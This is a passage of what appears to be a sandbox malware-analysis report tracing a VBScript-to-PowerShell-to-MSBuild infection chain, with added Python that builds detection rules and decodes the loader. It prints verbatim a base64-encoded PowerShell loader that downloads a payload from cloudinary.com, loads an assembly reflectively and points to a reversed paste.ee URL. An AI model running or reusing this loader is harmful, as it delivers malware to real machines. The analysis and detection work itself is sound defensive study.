                        Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\classers.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandledJump to behavior
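The process-creation entries above are enough to rebuild, as code, the chain signatures this report lists in its overview ("WScript or CScript Dropper", "Base64 Encoded PowerShell Command Detected", "Command shell drops VBS files", "Silenttrinity Stager Msbuild Activity"). The following Python is an added example and not part of the Joe Sandbox report: its event records are constructed from the entries above with the long base64 argument abbreviated, the last record is a constructed benign control (an IDE building a project) that must not fire, and the rule names are this example's own.

```python
"""Re-derive this report's process-chain signatures from process-creation records.

Each record is (parent image, child image, child command line).
"""
import re
from dataclasses import dataclass

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

# Constructed from the "Process created" entries of this report (base64 argument abbreviated).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\wscript.exe", PS,
     "powershell.exe $hamminesses = 'JGxp...';$stickhandled = [System.Text.Encoding]::UTF8"
     ".GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled"),
    (PS, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"'),
    (PS, MSB, f'"{MSB}"'),
    (PS, MSB, f'"{MSB}"'),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Constructed benign control, not from the report: an IDE building a project.
    (r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe", MSB,
     f'"{MSB}" app.csproj /t:Build'),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    child: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Base64 decode followed by Invoke-Expression / iex on the same command line.
B64_EXEC = re.compile(r"FromBase64String.*(Invoke-Expression|\biex\b)", re.I)
# cmd.exe copying a .vbs into C:\ProgramData (the staging step before the second wscript run).
VBS_STAGING = re.compile(r"\bcopy\b.*\.vbs.*\\ProgramData\\", re.I)
# A real build passes a project or solution file; a bare MSBuild.exe is the injection-host pattern.
PROJECT_ARG = re.compile(r"\.(\w*proj|sln)\b", re.I)


def image(path: str) -> str:
    """Lower-cased file name of a full image path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Apply all four rules to every record and return the findings in order."""
    findings = []
    for parent, child, cmdline in events:
        p, c = image(parent), image(child)
        if p in SCRIPT_HOSTS and c == "powershell.exe":
            findings.append(Finding("script_host_spawns_powershell", p, c))
        if c == "powershell.exe" and B64_EXEC.search(cmdline):
            findings.append(Finding("powershell_base64_decode_then_iex", p, c))
        if c == "cmd.exe" and VBS_STAGING.search(cmdline):
            findings.append(Finding("vbs_copied_to_programdata", p, c))
        if c == "msbuild.exe" and p == "powershell.exe" and not PROJECT_ARG.search(cmdline):
            findings.append(Finding("powershell_spawns_bare_msbuild", p, c))
    return findings


def rules_fired(events):
    """Distinct rule names that fired, sorted for stable comparison."""
    return sorted({f.rule for f in evaluate(events)})


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.rule:36s} {f.parent} -> {f.child}")
```

The MSBuild rule keys on the absence of a project or solution argument: the report's two MSBuild launches carry no arguments at all, which is what separates an in-memory stager host from a build, and why the constructed devenv.exe record stays silent.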
Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, taskschd.dll, sxs.dll, xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded (in order): winmm.dll, urlmon.dll, wininet.dll, iertutil.dll, srvcli.dll, netutils.dll, iphlpapi.dll, sspicli.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded (in order): kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                        Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell.exe $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG", "false")
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
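The $hamminesses value is only the outer layer. Base64-decoding it yields a second PowerShell stage that downloads a .jpg from res.cloudinary.com, cuts out the text between the <<BASE64_START>> and <<BASE64_END>> markers, reverses it character by character, base64-decodes that, loads the result with [System.Reflection.Assembly]::Load and calls dnlib.IO.Home.VAI with a reversed paste.ee URL, the host name MSBuild and the C:\ProgramData\classers.vbs persistence path as arguments, which ties this command line to the MSBuild.exe launches and the classers.vbs copy recorded above. The following Python is an added example, not part of the Joe Sandbox report: it decodes the blob exactly as copied from the command line above and pulls out those indicators; the function names and the choice of indicators are this example's own.

```python
"""Decode the base64 loader passed to powershell.exe in this report and extract its indicators."""
import base64
import re

# The $hamminesses value, copied verbatim from the powershell.exe command line in this report.
HAMMINESSES = "JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw=="

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
QUOTED_RE = re.compile(r"'([^']*)'")          # PowerShell single-quoted literals (no escapes inside)
INVOKE_RE = re.compile(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", re.S)
METHOD_RE = re.compile(r"\[([\w.]+)\]\.GetMethod\('(\w+)'\)")


def decode_stage(b64: str) -> str:
    """Mirror of [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...))."""
    return base64.b64decode(b64).decode("utf-8")


def forward_urls(script: str) -> list:
    """URLs written the normal way round."""
    return URL_RE.findall(script)


def reversed_urls(script: str) -> list:
    """String literals that only become URLs when read backwards (the '//:sptth' trick)."""
    return [lit[::-1] for lit in QUOTED_RE.findall(script)
            if lit[::-1].lower().startswith(("http://", "https://"))]


def invoke_args(script: str) -> list:
    """Positional string arguments handed to the reflectively loaded method."""
    m = INVOKE_RE.search(script)
    return QUOTED_RE.findall(m.group(1)) if m else []


def summarize(b64: str) -> dict:
    """Decode one layer and collect the indicators an analyst would pivot on."""
    script = decode_stage(b64)
    return {
        "download_urls": forward_urls(script),
        "reversed_urls": reversed_urls(script),
        "loader_method": METHOD_RE.findall(script),
        "invoke_args": invoke_args(script),
        "assembly_load": "[System.Reflection.Assembly]::Load(" in script,
    }


if __name__ == "__main__":
    for key, value in summarize(HAMMINESSES).items():
        print(f"{key}: {value}")
```

The reversed-literal check is worth keeping in any command-line decoder: the second-stage C2 URL never appears forwards anywhere in this chain, so a plain URL regex over the decoded text finds only the cloudinary.com download and misses the paste.ee address the report's "Connects to a pastebin service" signature refers to.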
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 15_2_0041BCE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004567E0 push eax; ret 15_2_004567FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0045B9DD push esi; ret 15_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00455EAF push ecx; ret 15_2_00455EC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00433FF6 push ecx; ret 15_2_00434009

                        Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe | File created: C:\ProgramData\classers.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00406128 ShellExecuteW,URLDownloadToFileW, 15_2_00406128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 15_2_00419BC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 15_2_0041BCE3
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (identical entries repeated)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical entries repeated)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX (identical entries repeated)

                        Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040E54F Sleep,ExitProcess, 15_2_0040E54F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 15_2_004198C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (identical entry repeated)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5208
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 4897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 4632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: foregroundWindowGot 1761
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7740 | Thread sleep count: 193 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7740 | Thread sleep time: -96500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 | Thread sleep count: 4897 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 | Thread sleep time: -14691000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 | Thread sleep count: 4632 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 | Thread sleep time: -13896000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8092 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 15_2_0041B42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0044D5E9 FindFirstFileExA, 15_2_0044D5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 15_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW, 15_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 15_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW, 15_2_00418C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 15_2_00408DA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 15_2_00406F06
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: wscript.exe, 0000000D.00000003.2449948318.000001C01F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450277919.000001C01F301000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450751224.000001C01F701000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419601586.000001C01F505000.00000004.00000020.00020000.00000000.sdmp, classers.vbs.10.dr | Binary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
Source: classers.vbs.10.dr | Binary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
Source: wscript.exe, 0000000D.00000003.2419750110.000001C01F44D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpnE
Source: svchost.exe, 00000012.00000002.3419118443.000002DC6B62B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
Source: wscript.exe, 0000000D.00000003.2449948318.000001C01F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450277919.000001C01F301000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450751224.000001C01F701000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419601586.000001C01F505000.00000004.00000020.00020000.00000000.sdmp, classers.vbs.10.dr | Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
Source: MSBuild.exe, 0000000F.00000002.3422949413.000000000127B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3420789598.000002DC70C59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000D.00000003.2420181162.000001C01F453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419750110.000001C01F44D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
Source: wscript.exe, 00000000.00000002.2136136823.0000029FFBD1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\z?g
Source: wscript.exe, 0000000D.00000003.2420181162.000001C01F453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419750110.000001C01F44D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | API call chain: ExitProcess graph end node graph_15-47845
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0043A65D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 15_2_0041BCE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00442554 mov eax, dword ptr fs:[00000030h] 15_2_00442554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0044E92E GetProcessHeap, 15_2_0044E92E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00434168
